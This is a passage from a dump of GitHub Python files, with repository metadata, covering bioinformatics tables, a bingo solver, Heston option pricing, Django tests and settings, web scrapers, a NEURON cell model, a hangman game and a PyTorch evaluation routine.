'AC',\n 'R': 'AG',\n 'W': 'AT',\n 'S': 'CG',\n 'Y': 'CT',\n 'K': 'GT',\n 'V': 'ACG',\n 'H': 'ACT',\n 'D': 'AGT',\n 'B': 'CGT',\n 'X': 'GATC',\n 'N': 'GATC',\n} + Sig('md5:916efdf0caefc4e0915fe89bc494d3e4')\n\n\nambig_nucl_gc_equiv = {\n 'B': 0.6666666666666666,\n 'D': 0.3333333333333333,\n 'H': 0.3333333333333333,\n 'K': 0.5,\n 'M': 0.5,\n 'N': 0.5,\n 'R': 0.5,\n 'S': 1.0,\n 'V': 0.6666666666666666,\n 'W': 0.0,\n 'X': 0.5,\n 'Y': 0.5,\n} + Sig('md5:1e124db4b8893fb1f240308436fa454c')\n\nambig_prot = {}\n\n# config for complementary DNA\ncomplDNA = {\n 'src': 'MNHKDGABCXYTUWRS-.mnhkdgabcxytuwrs',\n 'dest': 'KNDMHCTVGXRAAWYS-.kndmhctvgxraawys', 'outlier': '-',\n} + Sig('md5:72b8d46e58ae7cfd1268a50d66adcda5', cheat=CHEAT)\n\n\n# config for complementary RNA\ncomplRNA = {\n 'src': 'MNHKDGABCXYTUWRS-.mnhkdgabcxytuwrs',\n 'dest': 'KNDMHCUVGXRAAWYS-.kndmhcuvgxraawys', 'outlier': '-',\n} + Sig('md5:ebbe993330ececd7736b1d4f5e211e51', cheat=CHEAT)\n\ntest_data_dna = {\n '+': 'TTGATGGCTAAGAGTAAAATCTTAAAAAACACACTGGTTCTATATTTTCGTCAAGTTTTG',\n '-': 
'CAAAACTTGACGAAAATATAGAACCAGTGTGTTTTTTAAGATTTTACTCTTAGCCATCAA',\n} + Sig('md5:80df1e8c8c5eba1c54fdb5857e089fef', cheat=CHEAT)\n\ntest = complRNA\n","repo_name":"frozflame/molbiox","sub_path":"molbiox/kb/transcode.py","file_name":"transcode.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"35217681757","text":"# create the tables\ndef turn_into_list():\n data = []\n try:\n with open('tables.txt', 'r') as file:\n for row in file:\n if not row.strip():\n continue\n else:\n row = [int(x) for x in row.split()]\n data.append(row)\n except Exception as e:\n print(e)\n\n # Turn every fifth list into a list\n K = 5\n res = []\n subl = []\n cnt = 0\n for sub in data:\n subl.append(sub)\n cnt = cnt + 1\n if cnt >= K:\n res.append(subl)\n subl = []\n cnt = 0\n\n return res\n\n\ntables = turn_into_list()\nnumbers_to_draw = [\n 1, 76, 38, 96, 62, 41, 27, 33, 4, 2, 94, 15, 89, 25, 66, 14, 30, 0, 71,\n 21, 48, 44, 87, 73, 60, 50, 77, 45, 29, 18, 5, 99, 65, 16, 93, 95, 37,\n 3, 52, 32, 46, 80, 98, 63, 92, 24, 35, 55, 12, 81, 51, 17, 70, 78, 61,\n 91, 54, 8, 72, 40, 74, 68, 75, 67, 39, 64, 10, 53, 9, 31, 6, 7, 47, 42,\n 90, 20, 19, 36, 22, 43, 58, 28, 79, 86, 57, 49, 83, 84, 97, 11, 85, 26,\n 69, 23, 59, 82, 88, 34, 56, 13]\nwinner_tables = []\nwin = False\n\n\n# Check for horizontal win i.e 5 marked numbers in a row\ndef check_for_horizontal_win(table, last_draw_num):\n global win\n five_x = ['x', 'x', 'x', 'x', 'x']\n for row in table:\n if row == five_x:\n sum = calculate_score(table)\n score = sum * last_draw_num\n winner_tables.append(score)\n win = True\n\n\n# Check for vertical win i.e 5 marked numbers in a coulmn\ndef check_for_vertical_win(table, last_draw_num):\n global win\n five_x = ['x', 'x', 'x', 'x', 'x']\n for i in range(5):\n vertical_sqaures = []\n for j in range(5):\n vertical_sqaures.append(table[j][i])\n if vertical_sqaures == five_x:\n sum = calculate_score(table)\n score = sum * last_draw_num\n winner_tables.append(score)\n win = True\n\n\n# Calculate the score sum of all unmarked numbers\ndef calculate_score(table):\n unbolded_num = []\n\n for i in range(5):\n for j in range(5):\n if table[i][j] != 'x':\n unbolded_num.append(table[i][j])\n return sum(unbolded_num)\n\n\ndef bingo(table):\n if len(numbers_to_draw) == 0:\n this_turns_number = [0]\n this_turns_number = numbers_to_draw[0]\n numbers_to_draw.remove(this_turns_number)\n\n for i in range(5):\n for j in range(5):\n if table[i][j] == this_turns_number:\n table[i][j] = 'x'\n\n check_for_horizontal_win(table, this_turns_number)\n check_for_vertical_win(table, this_turns_number)\n\n\nfor table in tables:\n win = False\n numbers_to_draw = numbers_to_draw = [\n 1, 76, 38, 96, 62, 41, 27, 33, 4, 2, 94, 15, 89, 25, 66, 14, 30, 0, 71,\n 21, 48, 44, 87, 73, 60, 50, 77, 45, 29, 18, 5, 99, 65, 16, 93, 95, 37,\n 3, 52, 32, 46, 80, 98, 63, 92, 24, 35, 55, 12, 81, 51, 17, 70, 78, 61,\n 91, 54, 8, 72, 40, 74, 68, 75, 67, 39, 64, 10, 53, 9, 31, 6, 7, 47, 42,\n 90, 20, 19, 36, 22, 43, 58, 28, 79, 86, 57, 49, 83, 84, 97, 11, 85, 26,\n 69, 23, 59, 82, 88, 34, 56, 13]\n while not win:\n bingo(table)\n\nprint(f'Last Winner tabel: {min(winner_tables)}')\n","repo_name":"jalalk1244/bingo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22512139348","text":"from scipy import stats\nimport numpy as 
np\n\nif __name__ == '__main__':\n\n # option parameters\n T = 1\n S0 = 96.0\n H = 90 # limit\n K = 100.0 # strike\n r_premia = 10 # annual interest rate\n\n # Heston model parameters\n V0 = 0.01 # initial volatility\n kappa = 2.0 # heston parameter, mean reversion\n theta = 0.01 # heston parameter, long-run variance\n sigma = omega = 0.2 # heston parameter, volatility of variance.\n # Omega is used in variance tree, sigma - everywhere else\n rho = 0.5 # heston parameter #correlation\n\n\ndef generate_heston_trajectory_return(T, S0, H, K, r_premia, V0, kappa, theta, sigma, rho, N = 1000):\n \"\"\"simulates Heston monte-carlo for Down-and-out put directly through equations\"\"\"\n r = np.log(r_premia / 100 + 1)\n dt = float(T)/float(N)\n sqrt_dt = np.sqrt(dt)\n # trajectory started\n\n # initials\n S_t = S0\n V_t = V0\n\n random_values_for_V = stats.norm.rvs(size=N)\n random_values_for_S_uncorrelated = stats.norm.rvs(size=N)\n for j in range(N):\n # random walk for V\n random_value_for_V = random_values_for_V[j]\n dZ_V = random_value_for_V * sqrt_dt\n\n # random walk for S + correlation\n random_value_for_S = rho * random_value_for_V + np.sqrt(1 - pow(rho, 2)) * random_values_for_S_uncorrelated[j]\n dZ_S = random_value_for_S * sqrt_dt\n\n # equation for V\n dV_t = kappa * (theta - V_t) * dt + sigma * np.sqrt(V_t) * sqrt_dt * dZ_V\n V_t += dV_t\n V_t = max(0,V_t)\n # equation for S\n dS_t = S_t * r * dt + S_t * np.sqrt(V_t) * dZ_S\n S_t += dS_t\n # check barrier crossing on each step\n if S_t <= H:\n return 0\n\n return max(0, K-S_t)\n\n\ndef calculate_heston_mc_price(T, S0, H, K, r_premia, V0, kappa, theta, sigma, rho, trajectories=10000):\n\n r = np.log(r_premia / 100 + 1)\n monte_carlo_price = 0.0\n mc_price_square = 0.0\n\n for i in range(trajectories):\n payoff = np.exp(-r*T) * generate_heston_trajectory_return(T, S0, H, K, r_premia, V0, kappa, theta, sigma, rho)\n monte_carlo_price += payoff\n mc_price_square += np.power(payoff, 2)\n if i % 500 == 0:\n print('trajectory', i, 'of', trajectories)\n\n variance_of_payoff = (mc_price_square - (monte_carlo_price*monte_carlo_price)/trajectories)/(trajectories-1)\n result = monte_carlo_price / float(trajectories)\n price_error = 1.96*np.sqrt(variance_of_payoff)/np.sqrt(trajectories)\n return result, price_error\n\nif __name__ == '__main__':\n import time\n paths = 100000\n res_file = open('results_mc_' + str(paths) + '.txt', 'w')\n for S0 in range(91, 136, 5):\n start_time = time.clock()\n print(T, S0, H, K, r_premia, V0, kappa, theta, sigma, rho)\n mc_price, mc_error = calculate_heston_mc_price(T, S0, H, K, r_premia, V0, kappa, theta, sigma, rho,\n trajectories=paths)\n print(\"mc_price_done for \" + str(S0))\n print('S0:', str(S0), ';', 'price', str(mc_price), ';', 'price_error:', str(mc_error), file=res_file)\n end_time = time.clock() - start_time\n print('the price is %2f, computed in %2f seconds' % (mc_price, end_time))\n print('the price is %2f, computed in %2f seconds' % (mc_price, end_time), file=res_file)\n res_file.close()\n","repo_name":"inwise/Pyrgos","sub_path":"Wiener-Hopf Bates mex/scripts/heston_mc.py","file_name":"heston_mc.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"24707179442","text":"#-*-coding: utf-8-*-\n\nfrom mock import patch, MagicMock\nfrom webob.multidict import MultiDict\nfrom pyramid.testing import (\n DummyRequest, DummyResource\n)\n\nfrom ...tests.views import BaseViewTestCase\nfrom 
...views.accomodations import (\n Accomodation,\n AccomodationSearchForm,\n AccomodationsView,\n AccomodationForm,\n AccomodationAssignForm,\n)\n\n\nclass TestAccomodationsView(BaseViewTestCase):\n \n def test_index(self):\n AccomodationsView._get_title = lambda x: 'test'\n view = AccomodationsView(DummyResource(), DummyRequest())\n self.assertEqual({'title': 'test'}, view.index())\n\n @patch.object(AccomodationSearchForm, 'validate')\n @patch.object(AccomodationSearchForm, 'submit')\n @patch.object(\n AccomodationSearchForm, '_qb',\n return_value=MagicMock(\n get_count=lambda: 10, get_serialized=lambda: []\n )\n )\n def test_list(self, _qb, submit, validate):\n validate.return_value = True\n view = AccomodationsView(DummyResource(), DummyRequest())\n self.assertSetEqual({'total', 'rows'}, set(view.list().keys()))\n\n @patch.object(\n Accomodation, 'by_resource_id', return_value=Accomodation(id=1)\n )\n def test_view(self, by_resource_id):\n from pyramid.httpexceptions import HTTPFound\n AccomodationsView._get_title = lambda x, y=None: 'test'\n\n view = AccomodationsView(\n DummyResource(), DummyRequest(params=MultiDict({'rid': 1}))\n )\n self.assertIsInstance(view.view(), HTTPFound)\n\n AccomodationsView.edit = lambda x=None: {}\n view = AccomodationsView(DummyResource(), DummyRequest())\n self.assertSetEqual({'title', 'readonly'}, set(view.view().keys()))\n","repo_name":"mazvv/travelcrm","sub_path":"travelcrm/tests/views/test_accomodations.py","file_name":"test_accomodations.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"16"} +{"seq_id":"6623632731","text":"from app.models.slack.slack_base import SlackBase\n\n\nclass SlackPayment(SlackBase):\n\n\tdef __init__(self, user, payment, paypal):\n\t\tself.headers = 'Payment Notification'\n\t\tSlackBase.__init__(self)\n\t\tself.message = self.message + self.generate_message(user, payment, paypal)\n\n\n\tdef generate_message(self, user, payment, paypal):\t\t\n\t\tmessage = ''\n\t\tif paypal:\n\t\t\tmessage += 'Paypal transaction-id: ' + payment['transaction_id'] + '\\n'\n\t\tmessage += 'order-id: ' + payment['order_id'] + '\\n'\n\t\tmessage += 'username: ' + user.username + '\\n'\n\t\tmessage += 'Just completed his / her payment \\n'\n\t\treturn message","repo_name":"devsummit/backend","sub_path":"app/models/slack/slack_payment.py","file_name":"slack_payment.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"31301254453","text":"from .scraper import Scraper as default_scrpaer\r\n'''\r\n @post list\r\n method : GET\r\n url_0 = https://www.yw.go.kr/www/selectBbsNttList.do?key=26&bbsNo=16&pageUnit=10&searchCnd=all&pageIndex={}\r\n header :\r\n None\r\n'''\r\n'''\r\n @post info\r\n method : GET\r\n url : \r\n self.post_url + href\r\n header :\r\n None\r\n'''\r\nclass Scraper(default_scrpaer):\r\n def __init__(self, session):\r\n super().__init__(session)\r\n self.channel_name = '영월군청'\r\n self.post_board_name = '타기관소식'\r\n self.post_url = 'https://www.yw.go.kr/www'","repo_name":"choiseulong/chancewave_scraping","sub_path":"scrapingProject/workers/data_scraper/scraper_dormitory/rooms/gangwon/yw/scraper_1.py","file_name":"scraper_1.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41689843462","text":"#안전영역\nimport sys\nsys.setrecursionlimit(10 ** 
5)\n\ndef dfs(i, j, k, n, heights, visited):\n visited[i][j] = True\n dirs = [(1, 0), (0, 1), (-1, 0), (0, -1)]\n for di, dj in dirs:\n if 0 <= i + di < n and 0 <= j + dj < n and not visited[i+di][j+dj] and heights[i+di][j+dj] > k:\n dfs(i + di, j + dj, k, n, heights, visited)\n\ndef solution(n, heights, highest):\n biggest = 1\n for k in range(1, highest):\n visited = [[False] * n for _ in range(n)]\n cnt = 0\n for i in range(n):\n for j in range(n):\n if not visited[i][j] and heights[i][j] > k:\n dfs(i, j, k, n, heights, visited)\n cnt += 1\n biggest = max(biggest, cnt)\n return biggest\n\nn = int(input())\nheights = []\nhighest = -float('inf')\nfor _ in range(n):\n height = list(map(int, input().split()))\n highest = max(max(height), highest)\n heights.append(height)\nprint(solution(n, heights, highest))","repo_name":"dldbdud314/PS","sub_path":"백준/2468.py","file_name":"2468.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5565464836","text":"# Parameters\n\nDEFAULT_AUTO_FIELD = 'django.db.models.AutoField'\n\n# -----------------------------------------------------------------\n# --------------------- Django REST Framework ---------------------\n# -----------------------------------------------------------------\n\nREST_FRAMEWORK = {\n # 'DEFAULT_RENDERER_CLASSES': (\n # 'rest_framework.renderers.JSONRenderer',\n # )\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n 'PAGE_SIZE': 5\n}\n\n# ---------------------------------------------------------\n# --------------------- Boards Params ---------------------\n# ---------------------------------------------------------\n\nMAX_SUBJECT_CHAR_COUNT = 255\n\nMAX_CHAR_COUNT = 20000\n\nMIN_THREADS = 1\n\nMAX_THREADS = 200\n\nMIN_POSTS = 500\n\nMAX_POSTS = 1000\n\nBOARD_THUMB_SIZE = (400, 400)\n\nPOST_THUMB_SIZE = (200, 200)\n\nMAX_UPLOAD_SIZE = 5242880\n\nALLOWED_EXTENSIONS = (\"jpg\", \"jpeg\", \"gif\", \"png\")\n\nTHUMBNAIL_ALIASES = {\n '': {\n 'avatar': {'size': (50, 50), 'crop': True},\n },\n}\n\nVERSATILEIMAGEFIELD_SETTINGS = {\n # The amount of time, in seconds, that references to created images\n # should be stored in the cache. Defaults to `2592000` (30 days)\n 'cache_length': 2592000,\n # The name of the cache you'd like `django-versatileimagefield` to use.\n # Defaults to 'versatileimagefield_cache'. If no cache exists with the name\n # provided, the 'default' cache will be used instead.\n 'cache_name': 'versatileimagefield_cache',\n # The save quality of modified JPEG images. More info here:\n # https://pillow.readthedocs.io/en/latest/handbook/image-file-formats.html#jpeg\n # Defaults to 70\n 'jpeg_resize_quality': 70,\n # The name of the top-level folder within storage classes to save all\n # sized images. Defaults to '__sized__'\n 'sized_directory_name': '__sized__',\n # The name of the directory to save all filtered images within.\n # Defaults to '__filtered__':\n 'filtered_directory_name': '__filtered__',\n # The name of the directory to save placeholder images within.\n # Defaults to '__placeholder__':\n 'placeholder_directory_name': '__placeholder__',\n # Whether or not to create new images on-the-fly. Set this to `False` for\n # speedy performance but don't forget to 'pre-warm' to ensure they're\n # created and available at the appropriate URL.\n 'create_images_on_demand': True,\n # A dot-notated python path string to a function that processes sized\n # image keys. 
Typically used to md5-ify the 'image key' portion of the\n # filename, giving each a uniform length.\n # `django-versatileimagefield` ships with two post processors:\n # 1. 'versatileimagefield.processors.md5' Returns a full length (32 char)\n # md5 hash of `image_key`.\n # 2. 'versatileimagefield.processors.md5_16' Returns the first 16 chars\n # of the 32 character md5 hash of `image_key`.\n # By default, image_keys are unprocessed. To write your own processor,\n # just define a function (that can be imported from your project's\n # python path) that takes a single argument, `image_key` and returns\n # a string.\n 'image_key_post_processor': None,\n # Whether to create progressive JPEGs. Read more about progressive JPEGs\n # here: https://optimus.io/support/progressive-jpeg/\n 'progressive_jpeg': False\n}\n\n\nVERSATILEIMAGEFIELD_RENDITION_KEY_SETS = {\n 'image_gallery': [\n ('gallery_large', 'crop__800x450'),\n ('gallery_square_small', 'crop__50x50')\n ],\n 'primary_image_detail': [\n ('hero', 'crop__600x283'),\n ('social', 'thumbnail__800x800')\n ],\n 'primary_image_list': [\n ('list', 'crop__400x225'),\n ],\n 'headshot': [\n ('headshot_small', 'crop__150x175'),\n ]\n}\n\n\n\n# ------------------------------------------------------\n# --------------------- ETH Params ---------------------\n# ------------------------------------------------------\n\nETH_ADDR_LEN = 40\n\nETH_HEX_ADDR_LEN = 42\n\nMAINNET_INFURA_HTTP = \"https://mainnet.infura.io/v3/\"\n\nMAINNET_INFURA_WS = \"wss://mainnet.infura.io/ws/v3/\"\n\nRINKEBY_WS = \"wss://rinkeby-light.eth.linkpool.io/ws\"\n\nOPENSEA_API_URL = \"https://api.opensea.io/api/v1/assets\"\n\nLIMIT_OPENSEA = \"30\" # default is 20, caps at 50\n\nALCHEMY_API_HTTP = \"https://eth-mainnet.alchemyapi.io/v2/\"\n\nALCHEMY_API_WS = \"wss://eth-mainnet.ws.alchemyapi.io/v2/\"","repo_name":"garyb9/shatter","sub_path":"backend/django_app/mainapp/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"16"} +{"seq_id":"5669400964","text":"import cv2\nimport numpy as np\n\nclass NumberPlateRecognizor:\n\n # Constants for the model and image processing\n __MODEL_SHAPE = (736, 736) # Model input shape (width, height)\n __BACKEND_ID = cv2.dnn.DNN_BACKEND_OPENCV\n __TARGET_ID = cv2.dnn.DNN_TARGET_CPU\n\n def __init__(self, textdetection_model_file, textrecognition_model_file):\n \"\"\"\n Initialize the NumberPlateRecognizor object.\n\n Args:\n textdetection_model_file (str): File path to the text detection model.\n textrecognition_model_file (str): File path to the text recognition model.\n\n Raises:\n FileNotFoundError: If any of the provided file paths do not exist.\n \"\"\"\n\n # Initialize member objects, e.g., load models or configure settings\n\n # Initialize the text detection model\n self.__detector_model = self.__initialize_textdetector_model(textdetection_model_file)\n\n # Initialize CRNN for text recognition\n self.__recognizer, self.__character_set, self.__character_size, self.__vertex_coordinates = self.__initialize_english_textrecognition_model(textrecognition_model_file)\n\n def __initialize_textdetector_model(self, model_path):\n # Constants for text detection parameters\n binary_threshold = 0.3\n polygon_threshold = 0.5\n max_candidates = 200\n unclip_ratio = 2.0\n\n # Create a text detection model\n model = cv2.dnn_TextDetectionModel_DB(cv2.dnn.readNet(model_path))\n\n model.setPreferableBackend(self.__BACKEND_ID)\n 
model.setPreferableTarget(self.__TARGET_ID)\n\n model.setBinaryThreshold(binary_threshold)\n model.setPolygonThreshold(polygon_threshold)\n model.setUnclipRatio(unclip_ratio)\n model.setMaxCandidates(max_candidates)\n\n model.setInputParams(1.0/255.0, self.__MODEL_SHAPE, (122.67891434, 116.66876762, 104.00698793))\n return model\n\n def __initialize_english_textrecognition_model(self, model_path):\n # Create a text recognition model\n model = cv2.dnn.readNet(model_path)\n model.setPreferableBackend(self.__BACKEND_ID)\n model.setPreferableTarget(self.__TARGET_ID)\n\n # Define character set and size\n character_set = '0123456789abcdefghijklmnopqrstuvwxyz'\n character_size = (100, 32) # This must not be changed and must be in sync with next line\n vertex_coordinates = np.array([\n [0, 31],\n [0, 0],\n [99, 0],\n [99, 31]\n ],\n dtype=np.float32)\n\n return model, character_set, character_size, vertex_coordinates\n\n def __recognize_text(self, image, boxshape):\n # Preprocess the image\n vertices = boxshape.reshape((4, 2)).astype(np.float32)\n rotationMatrix = cv2.getPerspectiveTransform(vertices, self.__vertex_coordinates)\n cropped_image = cv2.warpPerspective(image, rotationMatrix, self.__character_size)\n cropped_image = cv2.cvtColor(cropped_image, cv2.COLOR_BGR2GRAY)\n text_blob = cv2.dnn.blobFromImage(cropped_image, size=self.__character_size, mean=127.5, scalefactor=1 / 127.5)\n\n # Forward pass\n self.__recognizer.setInput(text_blob)\n output_blob = self.__recognizer.forward()\n\n # Postprocess the recognized text\n text = ''\n for i in range(output_blob.shape[0]):\n c = np.argmax(output_blob[i][0])\n if c != 0:\n text += self.__character_set[c - 1]\n else:\n text += '-'\n\n # Return processed text\n char_list = []\n for i in range(len(text)):\n if text[i] != '-' and (not (i > 0 and text[i] == text[i - 1])):\n char_list.append(text[i])\n\n return ''.join(char_list)\n\n def __visualize(self, image, boxes, texts):\n # Visualize the recognized text on the image\n color = (255, 255, 255)\n isClosed = True\n thickness = 2\n pts = np.array(boxes[0])\n output = cv2.polylines(image, pts, isClosed, color, thickness)\n for box, text in zip(boxes[0], texts):\n cv2.putText(output, text, (box[1].astype(np.int32)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255))\n return output\n\n def detect_numberplate(self, original_image):\n \"\"\"\n Detect number plates in an input image.\n\n Args:\n original_image (numpy.ndarray): An OpenCV image object.\n\n Returns:\n numpy.ndarray: An image with number plates marked.\n\n Raises:\n ValueError: If the provided image is not a valid numpy.ndarray.\n \"\"\"\n try:\n # Ensure the image is a valid numpy.ndarray\n if not isinstance(original_image, np.ndarray):\n raise ValueError(\"Input image is not a valid numpy.ndarray.\")\n\n # Get the original image dimensions\n original_h, original_w, _ = original_image.shape\n scaleHeight = original_h / self.__MODEL_SHAPE[1]\n scaleWidth = original_w / self.__MODEL_SHAPE[0]\n\n # Resize the image to the model's input shape\n image = cv2.resize(original_image, self.__MODEL_SHAPE)\n\n # Detect the locations of text in the resized image\n results = self.__detector_model.detect(image)\n\n # Recognize text in the detected locations\n texts = []\n for box, score in zip(results[0], results[1]):\n text = self.__recognize_text(image, box.reshape(8))\n texts.append(text)\n\n # Scale the results bounding box back to the original image dimensions\n for i in range(len(results[0])):\n for j in range(4):\n box = results[0][i][j]\n 
results[0][i][j][0] = box[0] * scaleWidth\n results[0][i][j][1] = box[1] * scaleHeight\n\n # Draw results on the original input image\n original_image = self.__visualize(original_image, results, texts)\n return original_image\n\n except Exception as e:\n print(f\"Error in detect_numberplate: {str(e)}\")\n","repo_name":"ngopikrishna/995","sub_path":"11/numberplate_recognizor.py","file_name":"numberplate_recognizor.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70061072007","text":"from requests_html import HTMLSession\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nr = HTMLSession()\ndata = []\nurl = \"https://www.booking.com/searchresults.html?aid=304142&label=gen173nr-1FCAEoggI46AdIM1gEaHaIAQGYATG4ARfIAQzYAQHoAQH4AQKIAgGoAgO4AsGR9JsGwAIB0gIkZWMxYzYxNjUtYjBlNy00MDllLWFhNzgtMWNmYjlhOGUwNDE32AIF4AIB&checkin=2022-11-25&checkout=2022-11-26&dest_id=-2258072&dest_type=city&group_adults=null&req_adults=null&no_rooms=null&group_children=null&req_children=null\"\n\n\ndef getpage(url):\n page = r.get(url)\n soup = BeautifulSoup(page.content, \"html.parser\")\n return soup\n\n\ndef getcontent(soup):\n items = soup.find_all(\"div\", {\"data-testid\": \"property-card\"})\n for item in items:\n name = item.find(\"div\", {\"data-testid\": \"title\"}).text\n price = item.find(\"span\", {\"class\": \"fcab3ed991 bd73d13072\"}).text\n link = item.find(\"a\")[\"href\"]\n size = item.find(\"span\", class_=\"df597226dd\").text\n spec = item.find(\"div\", class_=\"cb5b4b68a4\").text\n place = item.find(\"span\", class_=\"f4bd0794db b4273d69aa\").text\n distance = item.find(\"span\", {\"data-testid\": \"distance\"}).text\n info = {\n \"place name\": name,\n \"price\": price,\n \"Rooms\": size,\n \"interior\": spec,\n \"location\": place,\n \"distance from location\": distance,\n \"place link\": link,\n }\n data.append(info)\n return\n\n\nsoup = getpage(url)\ngetcontent(soup)\n\nfr = pd.DataFrame(data)\nfr.to_csv(\"booking.csv\",index=False)\n","repo_name":"john10279011/scraping-booking.com","sub_path":"bookings.py","file_name":"bookings.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70807493130","text":"import os\n\nfrom neuronpp.cells.cell import Cell\nfrom neuronpp.core.cells.core_hoc_cell import CoreHocCell\n\npath = os.path.dirname(os.path.abspath(__file__))\nf_path = os.path.join(path, \"..\", \"commons/hocmodels/combe2018\")\n\n\nclass Combe2018Cell(Cell, CoreHocCell):\n def __init__(self, name=None, model_folder=f_path, spine_number=0,\n spine_secs_names=\"apic\",\n spine_seed: int = None):\n \"\"\"\n :param name:\n The name of the cell\n :param model_folder:\n The folder where the main folder of Combe et al. 2018 model is located\n :param spine_number:\n The number of spines added to the model with random_uniform distribution to the sections\n specified by 'spine_sec' param.\n :param spine_secs_names:\n The section or sections where to put spines. It can be:\n * a string - as a filter name, so you can set \"apic\" to add spies to all apical\n dendrites\n\n * a regex, which need to be prefixed with 'regex:' string before\n eg. 'regex:(apic)|(basal)'\n will return all sections wich have a name containing 'apic' or 'basal' string\n\n * a list of existing sections in the cell\n :param spine_seed:\n Seed value for the random_uniform spike distribution. 
Default is None\n meaning - there is no seed\n \"\"\"\n Cell.__init__(self, name, model_folder)\n CoreHocCell.__init__(self, name)\n\n main_file = os.path.join(model_folder, \"load_cell.hoc\")\n self.load_hoc(main_file)\n\n secs = self.filter_secs(name=spine_secs_names)\n\n # Add spines with AMPA and NMDA synapses\n self.combe_syns = []\n if spine_number > 0:\n\n self.add_randuniform_spines(secs=secs, spine_number=spine_number, head_nseg=10,\n neck_nseg=10, seed=spine_seed)\n\n # Copy mechanisms from parent sec of the neck and from the nec to the head\n self.copy_mechanisms(secs_to=self.necks, sec_from='parent')\n self.copy_mechanisms(secs_to=self.heads, sec_from='parent')\n\n ampa_syns = []\n nmda_syns = []\n\n # Create AMPA synapses\n ampa_weight = 1.2 * 0.00156\n for h in self.heads:\n syn = self.add_synapse(source=None, seg=h(1.0), mod_name=\"Exp2Syn\",\n netcon_weight=ampa_weight)\n syn.point_process.hoc.e = 0\n syn.point_process.hoc.tau1 = .5\n syn.point_process.hoc.tau2 = 1.0\n ampa_syns.append(syn)\n\n # Create NMDA synapses\n nmda_weight = 1.2 * 0.000882\n for h in self.heads:\n syn = self.add_synapse(source=None, seg=h(1.0), mod_name=\"nmdanet\",\n netcon_weight=nmda_weight)\n syn.point_process.hoc.Alpha = 0.35\n syn.point_process.hoc.Beta = 0.035\n nmda_syns.append(syn)\n\n for syns in zip(ampa_syns, nmda_syns):\n comp_syn = self.group_synapses(synapses=syns, tag=\"combe_type\")\n self.combe_syns.append(comp_syn)\n","repo_name":"ziemowit-s/neuronpp","sub_path":"neuronpp/cells/combe2018_cell.py","file_name":"combe2018_cell.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"7410624611","text":"from fig import lista\nimport random\n\n\ndef enter_letter():\n while True:\n sth = input(\"Enter letter: \")\n if sth == \" \":\n print(\"You have to enter letter: \")\n elif sth.isdigit():\n print(\"Not a number. 
Letter!\")\n else:\n return sth\n\n\ndef draw_hangman(counter):\n print(lista[counter])\n\n\ndef choose_letter(word, list):\n hit = 0\n mistake = 0\n cout_draw = 0\n while True:\n try:\n if hit < len(word) and cout_draw < 11:\n letter = enter_letter()\n if letter in word:\n for x in range(len(word)):\n if word[x] == letter:\n hit = hit + 1\n list[x] = letter\n for x in list:\n print(x, end=\" \")\n print()\n else:\n mistake = mistake + 1\n draw_hangman(mistake)\n cout_draw = cout_draw + 1\n else:\n print(\"The end\")\n break\n except IndexError:\n print(\"Game over\")\n break\n\n\ndef main():\n words_list = [\"kot\", \"py\", \"haha\", \"ola\", \"asd\"]\n list = []\n word = random.choice(words_list)\n list.extend(word)\n\n for x in range(len(list)):\n list[x] = \"?\"\n\n for x in list:\n print(x, end=\" \")\n print()\n\n choose_letter(word, list)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dpiskosz/hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36885129460","text":"import torch \r\nimport torch.nn as nn \r\nimport torch.nn.functional as F \r\nfrom torch.nn.utils.rnn import pad_sequence, pack_padded_sequence, pad_packed_sequence \r\nimport numpy as np \r\nfrom tqdm import tqdm\r\nimport json\r\nimport scipy\r\nfrom scipy import stats\r\n\r\ndef random_choice(p, max_val= 50):\r\n candid = [x for x in range(len(p))]\r\n p = np.array(p) / np.sum(p)\r\n index = [np.random.choice(candid, p = p.ravel()) for _ in range(max_val)]\r\n val = [1 for _ in range(max_val)]\r\n return index, val\r\n\r\ndef getrank(a, idx=0):\r\n return len(a)-list(np.array(a).argsort()).index(idx)\r\n\r\ndef write_json(fp, data):\r\n with open(fp, 'w') as f:\r\n json.dump(data, f)\r\n\r\ndef testing(models, taxo_test, device, test_syn, test_hyn, dep_path, epoch, args, is_softmax = False, compound = False, synonym = True, innerpath= False):\r\n models.eval() \r\n y_true = []\r\n y_pred = []\r\n score_pred = {}\r\n rank = []\r\n correct = 0 \r\n total = 0\r\n score_save = {}\r\n for t in tqdm(test_hyn):\r\n score_t = {}\r\n score_tmp = []\r\n num_of_paths = {}\r\n test_node = int(t)\r\n attach_pos = int(test_hyn[t][\"attach\"])\r\n relation_type = 